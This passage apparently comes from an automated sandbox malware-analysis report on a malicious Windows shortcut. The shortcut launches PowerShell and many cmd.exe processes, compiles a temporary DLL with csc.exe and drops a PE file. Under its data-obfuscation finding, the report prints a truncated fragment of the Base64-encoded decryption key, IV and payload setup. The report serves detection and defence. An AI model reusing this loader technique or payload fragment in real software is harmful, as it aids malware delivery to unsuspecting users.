Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: Windows PowerShell.lnk LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: :C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.pdb source: powershell.exe, 0000004B.00000002.2248209888.000002145EE74000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 75_2_00007FFD345700BD pushad ; iretd 75_2_00007FFD345700C1

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
